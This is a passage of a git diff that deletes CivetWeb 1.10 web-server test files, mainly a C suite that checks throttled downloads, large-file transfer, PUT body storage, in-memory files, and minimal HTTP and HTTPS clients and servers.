-	strcpy(client_err_buf, "reset-content");
-	client = mg_download("127.0.0.1",
-	                     8080,
-	                     0,
-	                     client_err_buf,
-	                     sizeof(client_err_buf),
-	                     "GET /throttle?q HTTP/1.0\r\n\r\n");
-
-	ck_assert(ctx != NULL);
-	ck_assert_str_eq(client_err_buf, "");
-
-	client_ri = mg_get_request_info(client);
-
-	ck_assert(client_ri != NULL);
-	ck_assert_str_eq(client_ri->local_uri, "200");
-
-	ck_assert_int_eq(client_ri->content_length, 1024 * 10);
-
-	data_read = 0;
-	t0 = time(NULL);
-	while (data_read < client_ri->content_length) {
-		r = mg_read(client, client_data_buf, sizeof(client_data_buf));
-		ck_assert_int_ge(r, 0);
-		data_read += r;
-	}
-	t1 = time(NULL);
-	dt = difftime(t1, t0) * 1000.0; /* Elapsed time in ms - in most systems
-	                                 * only with second resolution */
-
-	/* Time estimation: Data size is 10 kB, with 1 kB/s speed limit.
-	 * The first block (1st kB) is transferred immediately, the second
-	 * block (2nd kB) one second later, the third block (3rd kB) two
-	 * seconds later, .. the last block (10th kB) nine seconds later.
-	 * The resolution of time measurement using the "time" C library
-	 * function is 1 second, so we should add +/- one second tolerance.
-	 * Thus, download of 10 kB with 1 kB/s should not be faster than
-	 * 8 seconds. */
-
-	/* Check if there are at least 8 seconds */
-	ck_assert_int_ge((int)dt, 8 * 1000);
-
-	/* Nothing left to read */
-	r = mg_read(client, client_data_buf, sizeof(client_data_buf));
-	ck_assert_int_eq(r, 0);
-
-	/* Close the client connection */
-	mg_close_connection(client);
-
-	/* Stop the server */
-	test_mg_stop(ctx);
-
-	mark_point();
-}
-END_TEST
-
-
-START_TEST(test_init_library)
-{
-	unsigned f_avail, f_ret;
-
-	mark_point();
-
-	f_avail = mg_check_feature(0xFF);
-	f_ret = mg_init_library(f_avail);
-	ck_assert_uint_eq(f_ret, f_avail);
-}
-END_TEST
-
-
-#define LARGE_FILE_SIZE (1024 * 1024 * 10)
-
-static int
-test_large_file_begin_request(struct mg_connection *conn)
-{
-	const struct mg_request_info *ri;
-	long unsigned len = LARGE_FILE_SIZE;
-	const char *block = "0123456789";
-	uint64_t i;
-	size_t blocklen;
-
-	ck_assert(conn != NULL);
-	ri = mg_get_request_info(conn);
-	ck_assert(ri != NULL);
-
-	ck_assert_str_eq(ri->request_method, "GET");
-	ck_assert_str_eq(ri->http_version, "1.1");
-	ck_assert_str_eq(ri->remote_addr, "127.0.0.1");
-	ck_assert_ptr_eq(ri->query_string, NULL);
-	ck_assert_ptr_ne(ri->local_uri, NULL);
-
-	mg_printf(conn,
-	          "HTTP/1.1 200 OK\r\n"
-	          "Content-Length: %lu\r\n"
-	          "Connection: close\r\n\r\n",
-	          len);
-
-	blocklen = strlen(block);
-
-	for (i = 0; i < len; i += blocklen) {
-		mg_write(conn, block, blocklen);
-	}
-
-	mark_point();
-
-	return 200;
-}
-
-
-START_TEST(test_large_file)
-{
-	/* Server var */
-	struct mg_context *ctx;
-	struct mg_callbacks callbacks;
-	const char *OPTIONS[32];
-	int opt_cnt = 0;
-#if !defined(NO_SSL)
-	const char *ssl_cert = locate_ssl_cert();
-#endif
-	char errmsg[256] = {0};
-
-	/* Client var */
-	struct mg_connection *client;
-	char client_err_buf[256];
-	char client_data_buf[256];
-	const struct mg_request_info *client_ri;
-	int64_t data_read;
-	int r;
-	int retry, retry_ok_cnt, retry_fail_cnt;
-
-	mark_point();
-
-/* Set options and start server */
-#if !defined(NO_FILES)
-	OPTIONS[opt_cnt++] = "document_root";
-	OPTIONS[opt_cnt++] = ".";
-#endif
-#if defined(NO_SSL)
-	OPTIONS[opt_cnt++] = "listening_ports";
-	OPTIONS[opt_cnt++] = "8080";
-#else
-	OPTIONS[opt_cnt++] = "listening_ports";
-	OPTIONS[opt_cnt++] = "8443s";
-	OPTIONS[opt_cnt++] = "ssl_certificate";
-	OPTIONS[opt_cnt++] = ssl_cert;
-#ifdef __MACH__
-	/* The Apple builds on Travis CI seem to have problems with TLS1.x
-	 * Allow SSLv3 and TLS */
-	OPTIONS[opt_cnt++] = "ssl_protocol_version";
-	OPTIONS[opt_cnt++] = "2";
-#else
-	/* The Linux builds on Travis CI work fine with TLS1.2 */
-	OPTIONS[opt_cnt++] = "ssl_protocol_version";
-	OPTIONS[opt_cnt++] = "4";
-#endif
-	ck_assert(ssl_cert != NULL);
-#endif
-	OPTIONS[opt_cnt] = NULL;
-
-
-	memset(&callbacks, 0, sizeof(callbacks));
-	callbacks.begin_request = test_large_file_begin_request;
-	callbacks.log_message = log_msg_func;
-
-	ctx = test_mg_start(&callbacks, (void *)errmsg, OPTIONS);
-	ck_assert_str_eq(errmsg, "");
-	ck_assert(ctx != NULL);
-
-	/* Try downloading several times */
-	retry_ok_cnt = 0;
-	retry_fail_cnt = 0;
-	for (retry = 0; retry < 3; retry++) {
-		int fail = 0;
-		/* connect client */
-		memset(client_err_buf, 0, sizeof(client_err_buf));
-		memset(client_data_buf, 0, sizeof(client_data_buf));
-
-		client =
-		    mg_download("127.0.0.1",
-#if defined(NO_SSL)
-		                8080,
-		                0,
-#else
-		                8443,
-		                1,
-#endif
-		                client_err_buf,
-		                sizeof(client_err_buf),
-		                "GET /large.file HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n");
-
-		ck_assert(client != NULL);
-		ck_assert_str_eq(client_err_buf, "");
-
-		client_ri = mg_get_request_info(client);
-
-		ck_assert(client_ri != NULL);
-		ck_assert_str_eq(client_ri->local_uri, "200");
-
-		ck_assert_int_eq(client_ri->content_length, LARGE_FILE_SIZE);
-
-		data_read = 0;
-		while (data_read < client_ri->content_length) {
-			r = mg_read(client, client_data_buf, sizeof(client_data_buf));
-			if (r < 0) {
-				fail = 1;
-				break;
-			};
-			data_read += r;
-		}
-
-		/* Nothing left to read */
-		r = mg_read(client, client_data_buf, sizeof(client_data_buf));
-		if (fail) {
-			ck_assert_int_eq(r, -1);
-			retry_fail_cnt++;
-		} else {
-			ck_assert_int_eq(r, 0);
-			retry_ok_cnt++;
-		}
-
-		/* Close the client connection */
-		mg_close_connection(client);
-	}
-
-#if defined(_WIN32)
-// TODO: Check this problem on AppVeyor
-// ck_assert_int_le(retry_fail_cnt, 2);
-// ck_assert_int_ge(retry_ok_cnt, 1);
-#else
-	ck_assert_int_eq(retry_fail_cnt, 0);
-	ck_assert_int_eq(retry_ok_cnt, 3);
-#endif
-
-	/* Stop the server */
-	test_mg_stop(ctx);
-
-	mark_point();
-}
-END_TEST
-
-
-static int test_mg_store_body_con_len = 20000;
-
-
-static int
-test_mg_store_body_put_delete_handler(struct mg_connection *conn, void *ignored)
-{
-	char path[4096] = {0};
-	const struct mg_request_info *info = mg_get_request_info(conn);
-	int64_t rc;
-
-	(void)ignored;
-
-	mark_point();
-
-	sprintf(path, "./%s", info->local_uri);
-	rc = mg_store_body(conn, path);
-
-	ck_assert_int_eq(test_mg_store_body_con_len, rc);
-
-	if (rc < 0) {
-		mg_printf(conn,
-		          "HTTP/1.1 500 Internal Server Error\r\n"
-		          "Content-Type:text/plain;charset=UTF-8\r\n"
-		          "Connection:close\r\n\r\n"
-		          "%s (ret: %ld)\n",
-		          path,
-		          (long)rc);
-		mg_close_connection(conn);
-
-		/* Debug output for tests */
-		printf("mg_store_body(%s) failed (ret: %ld)\n", path, (long)rc);
-
-		return 500;
-	}
-
-	mg_printf(conn,
-	          "HTTP/1.1 200 OK\r\n"
-	          "Content-Type:text/plain;charset=UTF-8\r\n"
-	          "Connection:close\r\n\r\n"
-	          "%s OK (%ld bytes saved)\n",
-	          path,
-	          (long)rc);
-	mg_close_connection(conn);
-
-	/* Debug output for tests */
-	printf("mg_store_body(%s) OK (%ld bytes)\n", path, (long)rc);
-
-	mark_point();
-
-	return 200;
-}
-
-
-static int
-test_mg_store_body_begin_request_callback(struct mg_connection *conn)
-{
-	const struct mg_request_info *info = mg_get_request_info(conn);
-
-	mark_point();
-
-	/* Debug output for tests */
-	printf("test_mg_store_body_begin_request_callback called (%s)\n",
-	       info->request_method);
-
-	if ((strcmp(info->request_method, "PUT") == 0)
-	    || (strcmp(info->request_method, "DELETE") == 0)) {
-		return test_mg_store_body_put_delete_handler(conn, NULL);
-	}
-
-	mark_point();
-
-	return 0;
-}
-
-
-START_TEST(test_mg_store_body)
-{
-	/* Client data */
-	char client_err_buf[256];
-	char client_data_buf[1024];
-	struct mg_connection *client;
-	const struct mg_request_info *client_ri;
-	int r;
-	char check_data[256];
-	char *check_ptr;
-	char errmsg[256] = {0};
-
-	/* Server context handle */
-	struct mg_context *ctx;
-	struct mg_callbacks callbacks;
-	const char *options[] = {
-#if !defined(NO_FILES)
-		"document_root",
-		".",
-#endif
-#if !defined(NO_CACHING)
-		"static_file_max_age",
-		"0",
-#endif
-		"listening_ports",
-		"127.0.0.1:8082",
-		"num_threads",
-		"1",
-		NULL
-	};
-
-	mark_point();
-
-	memset(&callbacks, 0, sizeof(callbacks));
-	callbacks.begin_request = test_mg_store_body_begin_request_callback;
-	callbacks.log_message = log_msg_func;
-
-	/* Initialize the library */
-	mg_init_library(0);
-
-	/* Start the server */
-	ctx = mg_start(&callbacks, (void *)errmsg, options);
-	ck_assert_str_eq(errmsg, "");
-	ck_assert(ctx != NULL);
-
-	/* Run the server for 15 seconds */
-	test_sleep(15);
-
-	/* Call a test client */
-	client = mg_connect_client(
-	    "127.0.0.1", 8082, 0, client_err_buf, sizeof(client_err_buf));
-
-	ck_assert_str_eq(client_err_buf, "");
-	ck_assert(client != NULL);
-
-	mg_printf(client,
-	          "PUT /%s HTTP/1.0\r\nContent-Length: %i\r\n\r\n",
-	          "test_file_name.txt",
-	          test_mg_store_body_con_len);
-
-	r = 0;
-	while (r < test_mg_store_body_con_len) {
-		int l = mg_write(client, "1234567890", 10);
-		ck_assert_int_eq(l, 10);
-		r += 10;
-	}
-
-	r = mg_get_response(client, client_err_buf, sizeof(client_err_buf), 10000);
-	ck_assert_int_ge(r, 0);
-	ck_assert_str_eq(client_err_buf, "");
-
-	client_ri = mg_get_request_info(client);
-	ck_assert(client_ri != NULL);
-
-	/* Response must be 200 OK  */
-	ck_assert_ptr_ne(client_ri->request_uri, NULL);
-	ck_assert_str_eq(client_ri->request_uri, "200");
-
-	/* Read PUT response */
-	r = mg_read(client, client_data_buf, sizeof(client_data_buf) - 1);
-	ck_assert_int_gt(r, 0);
-	client_data_buf[r] = 0;
-
-	sprintf(check_data, "(%i bytes saved)", test_mg_store_body_con_len);
-	check_ptr = strstr(client_data_buf, check_data);
-	ck_assert_ptr_ne(check_ptr, NULL);
-
-	mg_close_connection(client);
-
-	/* Run the server for 5 seconds */
-	test_sleep(5);
-
-	/* Stop the server */
-	test_mg_stop(ctx);
-
-	/* Un-initialize the library */
-	mg_exit_library();
-
-	mark_point();
-}
-END_TEST
-
-
-#if defined(MG_USE_OPEN_FILE) && !defined(NO_FILES)
-
-#define FILE_IN_MEM_SIZE (1024 * 100)
-static char *file_in_mem_data;
-
-static const char *
-test_file_in_memory_open_file(const struct mg_connection *conn,
-                              const char *file_path,
-                              size_t *file_size)
-{
-	(void)conn;
-
-	if (strcmp(file_path, "./file_in_mem") == 0) {
-		/* File is in memory */
-		*file_size = FILE_IN_MEM_SIZE;
-		return file_in_mem_data;
-	} else {
-		/* File is not in memory */
-		return NULL;
-	}
-}
-
-
-START_TEST(test_file_in_memory)
-{
-	/* Server var */
-	struct mg_context *ctx;
-	struct mg_callbacks callbacks;
-	const char *OPTIONS[32];
-	int opt_cnt = 0;
-#if !defined(NO_SSL)
-	const char *ssl_cert = locate_ssl_cert();
-#endif
-
-	/* Client var */
-	struct mg_connection *client;
-	char client_err_buf[256];
-	char client_data_buf[256];
-	const struct mg_request_info *client_ri;
-	int64_t data_read;
-	int r, i;
-
-	/* Prepare test data */
-	file_in_mem_data = (char *)malloc(FILE_IN_MEM_SIZE);
-	ck_assert_ptr_ne(file_in_mem_data, NULL);
-	for (r = 0; r < FILE_IN_MEM_SIZE; r++) {
-		file_in_mem_data[r] = (char)(r);
-	}
-
-	/* Set options and start server */
-	OPTIONS[opt_cnt++] = "document_root";
-	OPTIONS[opt_cnt++] = ".";
-#if defined(NO_SSL)
-	OPTIONS[opt_cnt++] = "listening_ports";
-	OPTIONS[opt_cnt++] = "8080";
-#else
-	OPTIONS[opt_cnt++] = "listening_ports";
-	OPTIONS[opt_cnt++] = "8443s";
-	OPTIONS[opt_cnt++] = "ssl_certificate";
-	OPTIONS[opt_cnt++] = ssl_cert;
-	ck_assert(ssl_cert != NULL);
-#endif
-	OPTIONS[opt_cnt] = NULL;
-
-
-	memset(&callbacks, 0, sizeof(callbacks));
-	callbacks.open_file = test_file_in_memory_open_file;
-
-	ctx = test_mg_start(&callbacks, 0, OPTIONS);
-	ck_assert(ctx != NULL);
-
-	/* connect client */
-	memset(client_err_buf, 0, sizeof(client_err_buf));
-	memset(client_data_buf, 0, sizeof(client_data_buf));
-
-	client =
-	    mg_download("127.0.0.1",
-#if defined(NO_SSL)
-	                8080,
-	                0,
-#else
-	                8443,
-	                1,
-#endif
-	                client_err_buf,
-	                sizeof(client_err_buf),
-	                "GET /file_in_mem HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n");
-
-	ck_assert(client != NULL);
-	ck_assert_str_eq(client_err_buf, "");
-
-	client_ri = mg_get_request_info(client);
-
-	ck_assert(client_ri != NULL);
-	ck_assert_str_eq(client_ri->local_uri, "200");
-
-	ck_assert_int_eq(client_ri->content_length, FILE_IN_MEM_SIZE);
-
-	data_read = 0;
-	while (data_read < client_ri->content_length) {
-		r = mg_read(client, client_data_buf, sizeof(client_data_buf));
-		if (r > 0) {
-			for (i = 0; i < r; i++) {
-				ck_assert_int_eq((int)client_data_buf[i],
-				                 (int)file_in_mem_data[data_read + i]);
-			}
-			data_read += r;
-		}
-	}
-
-	/* Nothing left to read */
-	r = mg_read(client, client_data_buf, sizeof(client_data_buf));
-	ck_assert_int_eq(r, 0);
-
-	/* Close the client connection */
-	mg_close_connection(client);
-
-	/* Stop the server */
-	test_mg_stop(ctx);
-
-	/* Free test data */
-	free(file_in_mem_data);
-	file_in_mem_data = NULL;
-}
-END_TEST
-
-#else /* defined(MG_USE_OPEN_FILE) */
-
-START_TEST(test_file_in_memory)
-{
-	mark_point();
-}
-END_TEST
-
-#endif
-
-
-static void
-minimal_http_https_client_impl(const char *server,
-                               uint16_t port,
-                               int use_ssl,
-                               const char *uri)
-{
-	/* Client var */
-	struct mg_connection *client;
-	char client_err_buf[256];
-	char client_data_buf[256];
-	const struct mg_request_info *client_ri;
-	int64_t data_read;
-	int r;
-
-	mark_point();
-
-	client = mg_connect_client(
-	    server, port, use_ssl, client_err_buf, sizeof(client_err_buf));
-
-	ck_assert_str_eq(client_err_buf, "");
-	ck_assert(client != NULL);
-
-	mg_printf(client, "GET /%s HTTP/1.0\r\n\r\n", uri);
-
-	r = mg_get_response(client, client_err_buf, sizeof(client_err_buf), 10000);
-	ck_assert_int_ge(r, 0);
-	ck_assert_str_eq(client_err_buf, "");
-
-	client_ri = mg_get_request_info(client);
-	ck_assert(client_ri != NULL);
-
-	/* e.g.: ck_assert_str_eq(client_ri->request_uri, "200"); */
-	ck_assert_ptr_ne(client_ri->request_uri, NULL);
-	r = (int)strlen(client_ri->request_uri);
-	ck_assert_int_eq(r, 3);
-
-	data_read = 0;
-	while (data_read < client_ri->content_length) {
-		r = mg_read(client, client_data_buf, sizeof(client_data_buf));
-		if (r > 0) {
-			data_read += r;
-		}
-	}
-
-	/* Nothing left to read */
-	r = mg_read(client, client_data_buf, sizeof(client_data_buf));
-	ck_assert_int_eq(r, 0);
-
-	mark_point();
-
-	mg_close_connection(client);
-
-	mark_point();
-}
-
-
-static void
-minimal_http_client_impl(const char *server, uint16_t port, const char *uri)
-{
-	minimal_http_https_client_impl(server, port, 0, uri);
-}
-
-
-#if !defined(NO_SSL)
-static void
-minimal_https_client_impl(const char *server, uint16_t port, const char *uri)
-{
-	minimal_http_https_client_impl(server, port, 1, uri);
-}
-#endif
-
-
-START_TEST(test_minimal_client)
-{
-	mark_point();
-
-	/* Initialize the library */
-	mg_init_library(0);
-
-	mark_point();
-
-	/* Call a test client */
-	minimal_http_client_impl("192.30.253.113" /* www.github.com */,
-	                         80,
-	                         "civetweb/civetweb/");
-
-	mark_point();
-
-	/* Un-initialize the library */
-	mg_exit_library();
-
-	mark_point();
-}
-END_TEST
-
-
-static int
-minimal_test_request_handler(struct mg_connection *conn, void *cbdata)
-{
-	const char *msg = (const char *)cbdata;
-	unsigned long len = (unsigned long)strlen(msg);
-
-	mark_point();
-
-	mg_printf(conn,
-	          "HTTP/1.1 200 OK\r\n"
-	          "Content-Length: %lu\r\n"
-	          "Content-Type: text/plain\r\n"
-	          "Connection: close\r\n\r\n",
-	          len);
-
-	mg_write(conn, msg, len);
-
-	mark_point();
-
-	return 200;
-}
-
-
-START_TEST(test_minimal_http_server_callback)
-{
-	/* This test should ensure the minimum server example in
-	 * docs/Embedding.md is still running. */
-
-	/* Server context handle */
-	struct mg_context *ctx;
-
-	mark_point();
-
-	/* Initialize the library */
-	mg_init_library(0);
-
-	/* Start the server */
-	ctx = test_mg_start(NULL, 0, NULL);
-	ck_assert(ctx != NULL);
-
-	/* Add some handler */
-	mg_set_request_handler(ctx,
-	                       "/hello",
-	                       minimal_test_request_handler,
-	                       (void *)"Hello world");
-	mg_set_request_handler(ctx,
-	                       "/8",
-	                       minimal_test_request_handler,
-	                       (void *)"Number eight");
-
-	/* Run the server for 15 seconds */
-	test_sleep(10);
-
-	/* Call a test client */
-	minimal_http_client_impl("127.0.0.1", 8080, "/hello");
-
-	/* Run the server for 15 seconds */
-	test_sleep(5);
-
-
-	/* Stop the server */
-	test_mg_stop(ctx);
-
-	/* Un-initialize the library */
-	mg_exit_library();
-
-	mark_point();
-}
-END_TEST
-
-
-START_TEST(test_minimal_https_server_callback)
-{
-#if !defined(NO_SSL)
-	/* This test should show a HTTPS server with enhanced
-	 * security settings.
-	 *
-	 * Articles:
-	 * https://hynek.me/articles/hardening-your-web-servers-ssl-ciphers/
-	 *
-	 * Scanners:
-	 * https://securityheaders.io/
-	 * https://www.htbridge.com/ssl/
-	 * https://www.htbridge.com/websec/
-	 * https://www.ssllabs.com/ssltest/
-	 * https://www.qualys.com/forms/freescan/
-	 */
-
-	/* Server context handle */
-	struct mg_context *ctx;
-
-	/* Server start parameters for HTTPS */
-	const char *OPTIONS[32];
-	int opt_idx = 0;
-
-	/* HTTPS port - required */
-	OPTIONS[opt_idx++] = "listening_ports";
-	OPTIONS[opt_idx++] = "8443s";
-
-	/* path to certificate file - required */
-	OPTIONS[opt_idx++] = "ssl_certificate";
-	OPTIONS[opt_idx++] = locate_ssl_cert();
-
-#if defined(LOCAL_TEST) || defined(_WIN32)
-	/* Do not set this on Travis CI, since the build containers
-	 * contain older SSL libraries */
-
-	/* set minimum SSL version to TLS 1.2 - recommended */
-	OPTIONS[opt_idx++] = "ssl_protocol_version";
-	OPTIONS[opt_idx++] = "4";
-
-	/* set some modern ciphers - recommended */
-	OPTIONS[opt_idx++] = "ssl_cipher_list";
-	OPTIONS[opt_idx++] = "ECDH+AESGCM+AES256:!aNULL:!MD5:!DSS";
-#endif
-
-	/* set "HTTPS only" header - recommended */
-	OPTIONS[opt_idx++] = "strict_transport_security_max_age";
-	OPTIONS[opt_idx++] = "31622400";
-
-	/* end of options - required */
-	OPTIONS[opt_idx] = NULL;
-
-	mark_point();
-
-	/* Initialize the library */
-	mg_init_library(0);
-
-
-	/* Start the server */
-	ctx = test_mg_start(NULL, 0, OPTIONS);
-	ck_assert(ctx != NULL);
-
-	/* Add some handler */
-	mg_set_request_handler(ctx,
-	                       "/hello",
-	                       minimal_test_request_handler,
-	                       (void *)"Hello world");
-	mg_set_request_handler(ctx,
-	                       "/8",
-	                       minimal_test_request_handler,
-	                       (void *)"Number eight");
-
-	/* Run the server for 15 seconds */
-	test_sleep(10);
-
-	/* Call a test client */
-	minimal_https_client_impl("127.0.0.1", 8443, "/hello");
-
-	/* Run the server for 15 seconds */
-	test_sleep(5);
-
-
-	/* Stop the server */
-	test_mg_stop(ctx);
-
-	/* Un-initialize the library */
-	mg_exit_library();
-#endif
-	mark_point();
-}
-END_TEST
-
-
-#if !defined(REPLACE_CHECK_FOR_LOCAL_DEBUGGING)
-Suite *
-make_public_server_suite(void)
-{
-	Suite *const suite = suite_create("PublicServer");
-
-	TCase *const tcase_checktestenv = tcase_create("Check test environment");
-	TCase *const tcase_initlib = tcase_create("Init library");
-	TCase *const tcase_startthreads = tcase_create("Start threads");
-	TCase *const tcase_minimal_svr = tcase_create("Minimal Server");
-	TCase *const tcase_minimal_cli = tcase_create("Minimal Client");
-	TCase *const tcase_startstophttp = tcase_create("Start Stop HTTP Server");
-	TCase *const tcase_startstophttp_ipv6 =
-	    tcase_create("Start Stop HTTP Server IPv6");
-	TCase *const tcase_startstophttps = tcase_create("Start Stop HTTPS Server");
-	TCase *const tcase_serverandclienttls = tcase_create("TLS Server Client");
-	TCase *const tcase_serverrequests = tcase_create("Server Requests");
-	TCase *const tcase_storebody = tcase_create("Store Body");
-	TCase *const tcase_handle_form = tcase_create("Handle Form");
-	TCase *const tcase_http_auth = tcase_create("HTTP Authentication");
-	TCase *const tcase_keep_alive = tcase_create("HTTP Keep Alive");
-	TCase *const tcase_error_handling = tcase_create("Error handling");
-	TCase *const tcase_throttle = tcase_create("Limit speed");
-	TCase *const tcase_large_file = tcase_create("Large file");
-	TCase *const tcase_file_in_mem = tcase_create("File in memory");
-
-
-	tcase_add_test(tcase_checktestenv, test_the_test_environment);
-	tcase_set_timeout(tcase_checktestenv, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_checktestenv);
-
-	tcase_add_test(tcase_initlib, test_init_library);
-	tcase_set_timeout(tcase_initlib, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_initlib);
-
-	tcase_add_test(tcase_startthreads, test_threading);
-	tcase_set_timeout(tcase_startthreads, civetweb_min_test_timeout);
-	suite_add_tcase(suite, tcase_startthreads);
-
-	tcase_add_test(tcase_minimal_svr, test_minimal_http_server_callback);
-	tcase_add_test(tcase_minimal_svr, test_minimal_https_server_callback);
-	tcase_set_timeout(tcase_minimal_svr, civetweb_min_server_test_timeout);
-	suite_add_tcase(suite, tcase_minimal_svr);
-
-	tcase_add_test(tcase_minimal_cli, test_minimal_client);
-	tcase_set_timeout(tcase_minimal_cli, civetweb_min_server_test_timeout);
-	suite_add_tcase(suite, tcase_minimal_cli);
-
-	tcase_add_test(tcase_startstophttp, test_mg_start_stop_http_server);
-	tcase_set_timeout(tcase_startstophttp, civetweb_min_server_test_timeout);
-	suite_add_tcase(suite, tcase_startstophttp);
-
-	tcase_add_test(tcase_startstophttp_ipv6,
-	               test_mg_start_stop_http_server_ipv6);
-	tcase_set_timeout(tcase_startstophttp_ipv6,
-	                  civetweb_min_server_test_timeout);
-	suite_add_tcase(suite, tcase_startstophttp_ipv6);
-
-	tcase_add_test(tcase_startstophttps, test_mg_start_stop_https_server);
-	tcase_set_timeout(tcase_startstophttps, civetweb_min_server_test_timeout);
-	suite_add_tcase(suite, tcase_startstophttps);
-
-	tcase_add_test(tcase_serverandclienttls, test_mg_server_and_client_tls);
-	tcase_set_timeout(tcase_serverandclienttls,
-	                  civetweb_min_server_test_timeout);
-	suite_add_tcase(suite, tcase_serverandclienttls);
-
-	tcase_add_test(tcase_serverrequests, test_request_handlers);
-	tcase_set_timeout(tcase_serverrequests, civetweb_mid_server_test_timeout);
-	suite_add_tcase(suite, tcase_serverrequests);
-
-	tcase_add_test(tcase_storebody, test_mg_store_body);
-	tcase_set_timeout(tcase_storebody, civetweb_mid_server_test_timeout);
-	suite_add_tcase(suite, tcase_storebody);
-
-	tcase_add_test(tcase_handle_form, test_handle_form);
-	tcase_set_timeout(tcase_handle_form, civetweb_mid_server_test_timeout);
-	suite_add_tcase(suite, tcase_handle_form);
-
-	tcase_add_test(tcase_http_auth, test_http_auth);
-	tcase_set_timeout(tcase_http_auth, civetweb_min_server_test_timeout);
-	suite_add_tcase(suite, tcase_http_auth);
-
-	tcase_add_test(tcase_keep_alive, test_keep_alive);
-	tcase_set_timeout(tcase_keep_alive, civetweb_mid_server_test_timeout);
-	suite_add_tcase(suite, tcase_keep_alive);
-
-	tcase_add_test(tcase_error_handling, test_error_handling);
-	tcase_add_test(tcase_error_handling, test_error_log_file);
-	tcase_set_timeout(tcase_error_handling, civetweb_mid_server_test_timeout);
-	suite_add_tcase(suite, tcase_error_handling);
-
-	tcase_add_test(tcase_throttle, test_throttle);
-	tcase_set_timeout(tcase_throttle, civetweb_mid_server_test_timeout);
-	suite_add_tcase(suite, tcase_throttle);
-
-	tcase_add_test(tcase_large_file, test_large_file);
-	tcase_set_timeout(tcase_large_file, civetweb_mid_server_test_timeout);
-	suite_add_tcase(suite, tcase_large_file);
-
-	tcase_add_test(tcase_file_in_mem, test_file_in_memory);
-	tcase_set_timeout(tcase_file_in_mem, civetweb_mid_server_test_timeout);
-	suite_add_tcase(suite, tcase_file_in_mem);
-
-	return suite;
-}
-#endif
-
-
-#ifdef REPLACE_CHECK_FOR_LOCAL_DEBUGGING
-/* Used to debug test cases without using the check framework */
-/* Build command for Linux:
-gcc test/public_server.c src/civetweb.c -I include/ -I test/ -l pthread -l dl -D
-LOCAL_TEST -D REPLACE_CHECK_FOR_LOCAL_DEBUGGING -D MAIN_PUBLIC_SERVER=main
-*/
-
-static int chk_ok = 0;
-static int chk_failed = 0;
-
-
-void
-MAIN_PUBLIC_SERVER(void)
-{
-	unsigned f_avail = mg_check_feature(0xFF);
-	unsigned f_ret = mg_init_library(f_avail);
-	ck_assert_uint_eq(f_ret, f_avail);
-
-	test_the_test_environment(0);
-	test_threading(0);
-
-	test_minimal_client(0);
-
-	test_mg_start_stop_http_server(0);
-	test_mg_start_stop_https_server(0);
-	test_request_handlers(0);
-	test_mg_store_body(0);
-	test_mg_server_and_client_tls(0);
-	test_handle_form(0);
-	test_http_auth(0);
-	test_keep_alive(0);
-	test_error_handling(0);
-	test_error_log_file(0);
-	test_throttle(0);
-	test_large_file(0);
-	test_file_in_memory(0);
-
-	mg_exit_library();
-
-	printf("\nok: %i\nfailed: %i\n\n", chk_ok, chk_failed);
-}
-
-void
-_ck_assert_failed(const char *file, int line, const char *expr, ...)
-{
-	va_list va;
-	va_start(va, expr);
-	fprintf(stderr, "Error: %s, line %i\n", file, line); /* breakpoint here ! */
-	vfprintf(stderr, expr, va);
-	fprintf(stderr, "\n\n");
-	va_end(va);
-	chk_failed++;
-}
-
-void
-_ck_assert_msg(int cond, const char *file, int line, const char *expr, ...)
-{
-	va_list va;
-
-	if (cond) {
-		chk_ok++;
-		return;
-	}
-
-	va_start(va, expr);
-	fprintf(stderr, "Error: %s, line %i\n", file, line); /* breakpoint here ! */
-	vfprintf(stderr, expr, va);
-	fprintf(stderr, "\n\n");
-	va_end(va);
-	chk_failed++;
-}
-
-void
-_mark_point(const char *file, int line)
-{
-	chk_ok++;
-}
-
-void
-tcase_fn_start(const char *fname, const char *file, int line)
-{
-}
-void suite_add_tcase(Suite *s, TCase *tc){};
-void _tcase_add_test(TCase *tc,
-                     TFun tf,
-                     const char *fname,
-                     int _signal,
-                     int allowed_exit_value,
-                     int start,
-                     int end){};
-TCase *
-tcase_create(const char *name)
-{
-	return NULL;
-};
-Suite *
-suite_create(const char *name)
-{
-	return NULL;
-};
-void tcase_set_timeout(TCase *tc, double timeout){};
-
-#endif
diff --git a/thirdparty/civetweb-1.10/test/public_server.h b/thirdparty/civetweb-1.10/test/public_server.h
deleted file mode 100644
index c3e0d8e..0000000
--- a/thirdparty/civetweb-1.10/test/public_server.h
+++ /dev/null
@@ -1,28 +0,0 @@
-/* Copyright (c) 2015-2017 the Civetweb developers
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-#ifndef TEST_PUBLIC_SERVER_H_
-#define TEST_PUBLIC_SERVER_H_
-
-#include "civetweb_check.h"
-
-Suite *make_public_server_suite(void);
-
-#endif /* TEST_PUBLIC_H_ */
diff --git a/thirdparty/civetweb-1.10/test/require_test.lua b/thirdparty/civetweb-1.10/test/require_test.lua
deleted file mode 100644
index 6173dfa..0000000
--- a/thirdparty/civetweb-1.10/test/require_test.lua
+++ /dev/null
@@ -1,2 +0,0 @@
-require 'html_esc'

-require 'HugeText'

diff --git a/thirdparty/civetweb-1.10/test/resource_script_demo.lua b/thirdparty/civetweb-1.10/test/resource_script_demo.lua
deleted file mode 100644
index e21e465..0000000
--- a/thirdparty/civetweb-1.10/test/resource_script_demo.lua
+++ /dev/null
@@ -1,124 +0,0 @@
